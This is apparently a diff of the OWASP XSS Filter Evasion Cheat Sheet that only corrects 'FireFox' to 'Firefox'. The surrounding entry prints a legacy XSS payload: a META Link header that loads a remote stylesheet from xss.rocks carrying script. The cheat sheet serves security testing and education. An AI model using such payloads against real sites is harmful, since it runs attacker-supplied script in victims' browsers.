OWASP/CheatSheetSeries/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md

 #### Remote style sheet part 3

 This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky.
 According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera).
-The trick here is that I am setting a header (which is basically no different than in the HTTP header saying `Link: <http://xss.rocks/xss.css>; REL=stylesheet`) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:
+The trick here is that I am setting a header (which is basically no different than in the HTTP header saying `Link: <http://xss.rocks/xss.css>; REL=stylesheet`) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in Firefox:

 `<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">`